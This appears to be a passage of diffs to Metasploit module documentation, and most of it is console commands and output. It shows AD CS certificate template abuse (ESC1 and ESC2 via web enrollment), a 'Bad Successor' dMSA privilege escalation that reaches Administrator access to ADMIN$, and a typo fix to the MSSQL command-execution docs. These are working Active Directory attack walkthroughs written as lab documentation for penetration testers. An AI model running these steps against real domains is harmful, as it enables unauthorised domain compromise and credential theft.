[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143614_default_10.5.132.180_mit.kerberos.cca_417480.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143615_default_10.5.132.180_mit.kerberos.cca_766015.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template SubCA saved to /home/tmoose/.msf4/loot/20260116143615_default_10.5.132.180_windows.ad.cs_888697.pfx
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143617_default_10.5.132.180_mit.kerberos.cca_866496.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143617_default_10.5.132.180_mit.kerberos.cca_528295.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template ESC1-Template and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143619_default_10.5.132.180_mit.kerberos.cca_103101.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116143619_default_10.5.132.180_mit.kerberos.cca_871753.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template ESC1-Template saved to /home/tmoose/.msf4/loot/20260116143620_default_10.5.132.180_windows.ad.cs_135453.pfx
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/http/web_enrollment_cert) >
```
# Kerberos, ESC1
```msf
msf auxiliary(admin/http/web_enrollment_cert) > set MODE QUERY_ONLY
MODE => QUERY_ONLY
msf auxiliary(admin/http/web_enrollment_cert) > run
[*] Retrieving available template list, this may take a few minutes
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144412_default_10.5.132.180_mit.kerberos.cca_605997.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144413_default_10.5.132.180_mit.kerberos.cca_011223.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[*] ***Templates with CT_FLAG_MACHINE_TYPE set like Machine and DomainController will not display as available, even if they are.***
[+] Available Certificates for on : User, EFS, Administrator, EFSRecovery, ESC16_1, ESC2-Template, WebServer, SubCA, ESC1-Template
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/http/web_enrollment_cert) > set httpusername msfuser
httpusername => msfuser
msf auxiliary(admin/http/web_enrollment_cert) > set httppassword v3Mpassword
httppassword => v3Mpassword
msf auxiliary(admin/http/web_enrollment_cert) > set mode SPECIFIC_TEMPLATE
mode => SPECIFIC_TEMPLATE
msf auxiliary(admin/http/web_enrollment_cert) > set cert_template ESC1-Template
cert_template => ESC1-Template
msf auxiliary(admin/http/web_enrollment_cert) > set ALT_UPN Administrator@example.com
ALT_UPN => Administrator@example.com
msf auxiliary(admin/http/web_enrollment_cert) > run
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144915_default_10.5.132.180_mit.kerberos.cca_142147.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144915_default_10.5.132.180_mit.kerberos.cca_645508.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template ESC1-Template and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144917_default_10.5.132.180_mit.kerberos.cca_079562.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116144917_default_10.5.132.180_mit.kerberos.cca_912221.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template ESC1-Template saved to /home/tmoose/.msf4/loot/20260116144918_default_10.5.132.180_windows.ad.cs_076676.pfx
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/http/web_enrollment_cert) >
```
# Kerberos, ESC2
```msf
msf auxiliary(admin/http/web_enrollment_cert) > show options
Module options (auxiliary/admin/http/web_enrollment_cert):
Name Current Setting Required Description
---- --------------- -------- -----------
ALT_DNS no Alternative certificate DNS
ALT_SID no Alternative object SID
ALT_UPN Administrator@example.com no Alternative certificate UPN (format: USER@DOMAIN)
HttpPassword v3Mpassword no The HTTP password to specify for authentication
HttpUsername msfuser no The HTTP username to specify for authentication
MODE SPECIFIC_TEMPLATE yes The issue mode. (Accepted: ALL, QUERY_ONLY, SPECIFIC_TEMPLATE)
ON_BEHALF_OF no Username to request on behalf of (format: DOMAIN\USER)
PFX no Certificate to request on behalf of
Proxies no A proxy chain of format type:host:port[,type:host:port][...]. Supported proxi
es: socks5h, sapni, socks4, http, socks5
RHOSTS 10.5.132.180 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/bas
ics/using-metasploit.html
RPORT 80 yes The target port (TCP)
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /certsrv/ yes The URI for the cert server.
THREADS 1 yes The number of concurrent threads (max one per host)
VHOST no HTTP server virtual host
When MODE is SPECIFIC_TEMPLATE:
Name Current Setting Required Description
---- --------------- -------- -----------
CERT_TEMPLATE ESC1-Template no The template to issue if MODE is SPECIFIC_TEMPLATE.
View the full module info with the info, or info -d command.
msf auxiliary(admin/http/web_enrollment_cert) > set CERT_TEMPLATE User
CERT_TEMPLATE => User
msf auxiliary(admin/http/web_enrollment_cert) > unset ALT_UPN
Unsetting ALT_UPN...
msf auxiliary(admin/http/web_enrollment_cert) > run
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116150908_default_10.5.132.180_mit.kerberos.cca_798433.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116150908_default_10.5.132.180_mit.kerberos.cca_355039.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template User and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116150910_default_10.5.132.180_mit.kerberos.cca_649135.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116150910_default_10.5.132.180_mit.kerberos.cca_950645.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template User saved to /home/tmoose/.msf4/loot/20260116150911_default_10.5.132.180_windows.ad.cs_854591.pfx
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/http/web_enrollment_cert) > set PFX /home/tmoose/.msf4/loot/20260116150911_default_10.5.132.180_windows.ad.cs_854591.pfx
PFX => /home/tmoose/.msf4/loot/20260116150911_default_10.5.132.180_windows.ad.cs_854591.pfx
msf auxiliary(admin/http/web_enrollment_cert) > set ON_BEHALF_OF EXAMPLE\\Administrator
ON_BEHALF_OF => EXAMPLE\Administrator
msf auxiliary(admin/http/web_enrollment_cert) > set cert_template User
cert_template => User
msf auxiliary(admin/http/web_enrollment_cert) > run
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116151145_default_10.5.132.180_mit.kerberos.cca_970115.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116151145_default_10.5.132.180_mit.kerberos.cca_854009.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate generated using template User and
[+] 10.5.132.180:88 - Received a valid TGT-Response
[*] 10.5.132.180:80 - TGT MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116151147_default_10.5.132.180_mit.kerberos.cca_332600.bin
[+] 10.5.132.180:88 - Received a valid TGS-Response
[*] 10.5.132.180:80 - TGS MIT Credential Cache ticket saved to /home/tmoose/.msf4/loot/20260116151147_default_10.5.132.180_mit.kerberos.cca_241072.bin
[+] 10.5.132.180:88 - Received a valid delegation TGS-Response
[+] Certificate for using template User saved to /home/tmoose/.msf4/loot/20260116151147_default_10.5.132.180_windows.ad.cs_115992.pfx
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(admin/http/web_enrollment_cert) >
```
@@ -0,0 +1,240 @@
## Vulnerable Application
This module exploits 'Bad Successor', which allows operators to elevate privileges on domain controllers
running at the Windows 2025 forest functional level. Microsoft decided to introduce Delegated Managed Service
Accounts (dMSA) in this forest level and they came ripe for exploitation.
Normal users can't create dMSA accounts where dMSA accounts are supposed to be created, the Managed Service
Accounts OU, but if a normal user has write access to any other OU they can then create a dMSA account in
said OU. After creating the account the user can edit LDAP attributes of the account to indicate that this
account should inherit privileges from the Administrator user. Once this is complete we can request kerberos
tickets on behalf of the dMSA account and voilà, you're admin.
The module has two actions, one for creating the dMSA account and setting it up to impersonate a high
privilege user, and another action for requesting the kerberos tickets needed to use the dMSA account for privilege
escalation.
## Setup
- Download the Windows Server 2025 .iso
- Install a new Windows Server 2025 instance.
- Rename the computer to `DC1` and hardcode the IP address.
- Promote the server to a domain controller for a new forest (e.g., `msf.local`).
- Set the domain functional level to Windows Server 2025.
- Once the domain controller is set up, create a `KdsRootKey` with an effective time at least 10 hours in the past:
```powershell
PS C:\Users\Administrator> Add-KdsRootKey -EffectiveTime (Get-Date).AddHours(-10)
Guid
----
6d0d01bb-f6e6-0f0c-7ec8-d65d2cbca174
```
- Verify the key has been created and the `EffectiveTime` is in the past successfully with the following command:
```
PS C:\Users\Administrator> Get-KdsRootKey
AttributeOfWrongFormat :
KeyValue : {117, 226, 79, 104...}
EffectiveTime : 11/17/2025 7:46:20 AM
CreationTime : 11/17/2025 5:46:20 PM
IsFormatValid : True
DomainController : CN=DC5,OU=Domain Controllers,DC=msf,DC=test
ServerConfiguration : Microsoft.KeyDistributionService.Cmdlets.KdsServerConfiguration
KeyId : 6d0d01bb-f6e6-0f0c-7ec8-d65d2cbca174
VersionNumber : 1
```
- Create an Organizational Unit (OU) to contain the dMSA accounts:
```powershell
New-ADOrganizationalUnit -Name "testing" -Path "DC=msf,DC=local"
```
- Open Active Directory Users and Computers (ADUC) and delegate CreateAllChild permissions on the newly created OU to a low-privilege user.
- Select the new OU, right-click, and choose Properties
- Select the Security tab and click Advanced
- Click Add, then click Select a principal
- Enter the low-privilege user's name and click OK
- In the Permissions window, check the box for Create all child objects and click OK
- Ensure Type is set to "Allow"
- Ensure Applies to is set to "This object and all descendant objects" - important
- Click OK to apply the changes and close all dialog boxes.
- The low-privilege user should now have the necessary permissions to create dMSA accounts in the specified OU and edit
its attributes in order to be vulnerable to Bad Successor.
- Run the following command to ensure the domain controller has not had any hardening applied that might prevent BadSuccessor for being exploited:
```powershell
(Get-ADObject ("CN=Directory Service,CN=Windows NT,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -Properties dSHeuristics).dSHeuristics
```
- If the output is blank, that means dSHeuristics is set to the default and the domain controller is vulnerable.
- If the output contains a value ensure that the 28th character is not set to '1' (e.g., `00000000010000000002000000000`)
- For testing purposes, if it is set to '1', you can set it to a vulnerable value with admin privileges and the following command:
```powershell
Set-ADObject ("CN=Directory Service,CN=Windows NT,CN=Services," + (Get-ADRootDSE).configurationNamingContext) -replace @{dSHeuristics='00000000010000000002000000001'}
```
## Actions
There are two kind of actions the module can run:
1. **CREATE_DMSA** - Creates a dMSA account vulnerable to BadSuccessor. [Default]
2. **GET_TICKET** - Issues a kerberos ticket for the created dMSA account to gain elevated privileges.
## Verification Steps
1. Start msfconsole
1. Create a dMSA account and set it to impersonate Administrator:
1. Do: `use admin/ldap/bad_successor`
1. Do: `set ACTION CREATE_DMSA`
1. Do: `set RHOSTNAME <domain controller FQDN>`
1. Do: `set DMSA_ACCOUNT_NAME <dMSA account name>`
1. Do: `set ACCOUNT_TO_IMPERSONATE Administrator`
1. Do: `set LDAPDomain <domain name>`
1. Do: `set LDAPUsername <username>`
1. Do: `set LDAPPassword <password>`
1. Do: `set rhost <domain controller IP>`
1. Do: `run`
1. Use the created dMSA account to get elevated kerberos tickets:
1. Do: `set ACTION GET_TICKET`
1. Do: `set SERVICE cifs`
1. With all the other options the same as before, do: `run`
## Options
### DMSA_ACCOUNT_NAME
The name of the dMSA account to be created.
### ACCOUNT_TO_IMPERSONATE
The name of the account to impersonate using the dMSA.
### DC_FQDN
The fully qualified domain name (FQDN) of the domain controller.
## Scenarios
### Action: CREATE_DMSA
#### Create dMSA on a Windows 2025 Domain Controller
```
msf auxiliary(admin/ldap/bad_successor) > set RHOSTNAME dc5.msf.test
RHOSTNAME => dc5.msf.test
msf auxiliary(admin/ldap/bad_successor) > set DMSA_ACCOUNT_NAME attacker_dMSA
DMSA_ACCOUNT_NAME => attacker_dMSA
msf auxiliary(admin/ldap/bad_successor) > set LDAPDomain msf.test
LDAPDomain => msf.test
msf auxiliary(admin/ldap/bad_successor) > set LDAPPassword N0tpassword!
LDAPPassword => N0tpassword!
smsf auxiliary(admin/ldap/bad_successor) > set LDAPUsername msfuser
LDAPUsername => msfuser
msf auxiliary(admin/ldap/bad_successor) > set rhost 172.16.199.209
rhost => 172.16.199.209
msf auxiliary(admin/ldap/bad_successor) > run
[*] Discovering base DN automatically
[+] Found 3 OUs we can write to, listing them below:
[+] - OU=Domain Controllers,DC=msf,DC=test
[+] - OU=BadBois,DC=msf,DC=test
[+] - OU=dMSA_Accounts,DC=msf,DC=test
[*] Attempting to create dmsa account cn: attacker_dMSA, dn: CN=attacker_dMSA,OU=dMSA_Accounts,DC=msf,DC=test
[+] Created dmsa attacker_dMSA
[*] Setting attributes for dMSA object: CN=attacker_dMSA,OU=dMSA_Accounts,DC=msf,DC=test
[+] Successfully updated attributes for dMSA object: CN=attacker_dMSA,OU=dMSA_Accounts,DC=msf,DC=test
[*] msds-delegatedmsastate => ["2"]
[*] msds-managedaccountprecededbylink => ["CN=Administrator,CN=Users,DC=msf,DC=test"]
[*] Auxiliary module execution completed
```
### Action: GET_TICKET
#### Elevate privileges using the created dMSA
```
msf auxiliary(admin/ldap/bad_successor) > set RHOSTNAME dc5.msf.test
RHOSTNAME => dc5.msf.test
msf auxiliary(admin/ldap/bad_successor) > set DMSA_ACCOUNT_NAME attacker_dMSA
DMSA_ACCOUNT_NAME => attacker_dMSA
msf auxiliary(admin/ldap/bad_successor) > set LDAPDomain msf.test
LDAPDomain => msf.test
msf auxiliary(admin/ldap/bad_successor) > set LDAPPassword N0tpassword!
LDAPPassword => N0tpassword!
smsf auxiliary(admin/ldap/bad_successor) > set LDAPUsername msfuser
LDAPUsername => msfuser
msf auxiliary(admin/ldap/bad_successor) > set rhost 172.16.199.209
rhost => 172.16.199.209
msf auxiliary(admin/ldap/bad_successor) > run
[*] Running module against 172.16.199.209
[*] Loading admin/kerberos/get_ticket
[*] 172.16.199.209:88 - Getting TGT for msfuser@msf.test
[+] 172.16.199.209:88 - Received a valid TGT-Response
[*] 172.16.199.209:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20251119215739_default_172.16.199.209_mit.kerberos.cca_626542.bin
[+] Obtained TGT for the user msfuser
[*] Using cached credential for krbtgt/MSF.TEST@MSF.TEST msfuser@MSF.TEST
[*] 172.16.199.209:88 - Getting TGS impersonating attacker_dMSA$@msf.test (SPN: krbtgt/msf.test)
[+] 172.16.199.209:88 - Received a valid TGS-Response
[*] 172.16.199.209:88 - TGT MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20251119215741_default_172.16.199.209_mit.kerberos.cca_263687.bin
[*] dMSA Key Package:
[*] Current Keys:
[+] Type: AES256, Key: c1085cb36ef8c1e7d62693ba4e3402523c8a4c300591ac2fdd1643d0cd80e6ad
[+] Type: AES128, Key: ce576bbe6386f5aaee691192ecf0684a
[+] Type: RC4, Key: 9857452d6e592835e9b4ef337c1be5c8
[*] Previous Keys:
[+] Type: RC4, Key: 4fd408d8f8ecb20d4b0768a0ac44b71f
[+] Obtained TGT for dMSA attacker_dMSA
[*] Using cached credential for krbtgt/MSF.TEST@MSF.TEST attacker_dMSA$@msf.test
[*] 172.16.199.209:88 - Getting TGS for attacker_dMSA$@msf.test (SPN: cifs/dc5.msf.test)
[+] 172.16.199.209:88 - Received a valid TGS-Response
[*] 172.16.199.209:88 - TGS MIT Credential Cache ticket saved to /Users/jheysel/.msf4/loot/20251119215742_default_172.16.199.209_mit.kerberos.cca_858140.bin
[+] 172.16.199.209:88 - Received a valid delegation TGS-Response
[+] Obtained elevated TGT for attacker_dMSA
[*] Auxiliary module execution completed
```
### Use ticket to connect to the ADMIN$ SMB share
```
msf auxiliary(scanner/smb/smb_login) > set username attacker_dMSA$
username => attacker_dMSA$
msf auxiliary(scanner/smb/smb_login) > set rhost 172.16.199.209
rhost => 172.16.199.209
msf auxiliary(scanner/smb/smb_login) > set domaincontrollerrhost 172.16.199.209
domaincontrollerrhost => 172.16.199.209
msf auxiliary(scanner/smb/smb_login) > set SMB::Rhostname dc5.msf.test
SMB::Rhostname => dc5.msf.test
msf auxiliary(scanner/smb/smb_login) > set SMB::Auth kerberos
SMB::Auth => kerberos
msf auxiliary(scanner/smb/smb_login) > set SMB::Krb5Ccname
SMB::Krb5Ccname =>
msf auxiliary(scanner/smb/smb_login) > set SMB::Krb5Ccname /Users/jheysel/.msf4/loot/20251119215742_default_172.16.199.209_mit.kerberos.cca_858140.bin
SMB::Krb5Ccname => /Users/jheysel/.msf4/loot/20251119215742_default_172.16.199.209_mit.kerberos.cca_858140.bin
msf auxiliary(scanner/smb/smb_login) > run
[*] 172.16.199.209:445 - 172.16.199.209:445 - Starting SMB login bruteforce
[*] 172.16.199.209:445 - Loaded a credential from ticket file: /Users/jheysel/.msf4/loot/20251119215742_default_172.16.199.209_mit.kerberos.cca_858140.bin
[+] 172.16.199.209:445 - 172.16.199.209:445 - Success: 'msf.test\attacker_dMSA$:' Administrator
[*] SMB session 3 opened (172.16.199.1:33643 -> 172.16.199.209:445) at 2025-11-19 22:23:14 -0800
[*] 172.16.199.209:445 - Scanned 1 of 1 hosts (100% complete)
[*] 172.16.199.209:445 - Bruteforce completed, 1 credential was successful.
[*] 172.16.199.209:445 - 1 SMB session was opened successfully.
[*] Auxiliary module execution completed
msf auxiliary(scanner/smb/smb_login) > sessions -i
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
3 smb SMB attacker_dMSA$ @ 172.16.199.209:445 172.16.199.1:33643 -> 172.16.199.209:445 (172.16.199.209)
msf auxiliary(scanner/smb/smb_login) > sessions -i -1
[*] Starting interaction with 3...
SMB (172.16.199.209) > shares
Shares
======
# Name Type comment
- ---- ---- -------
0 ADMIN$ DISK|SPECIAL Remote Admin
1 C$ DISK|SPECIAL Default share
2 IPC$ IPC|SPECIAL Remote IPC
3 NETLOGON DISK Logon server share
4 SYSVOL DISK Logon server share
SMB (172.16.199.209) > shares -i ADMIN$
[+] Successfully connected to ADMIN$
SMB (172.16.199.209\ADMIN$) > pwd
Current directory is \\172.16.199.209\ADMIN$\
```
@@ -21,7 +21,7 @@ technique leverages the [`sp_OACreate`][2] stored procedure to create an instanc
## Verification Steps
1. Do: `use use admin/mssql/mssql_exec`
1. Do: `use admin/mssql/mssql_exec`
2. Do: `set USERNAME [username1]`
3. Do: `set PASSWORD [password1]`
3. Do: `set TECHNIQUE sp_oacreate` (optional, defaults to xp_cmdshell)
@@ -32,7 +32,7 @@ technique leverages the [`sp_OACreate`][2] stored procedure to create an instanc
## Scenarios
```
msf > use use use admin/mssql/mssql_exec
msf > use admin/mssql/mssql_exec
msf auxiliary(mssql_exec) > set USERNAME username1
USERNAME => username1
msf auxiliary(mssql_exec) > set PASSWORD password1

Some files were not shown because too many files have changed in this diff Show More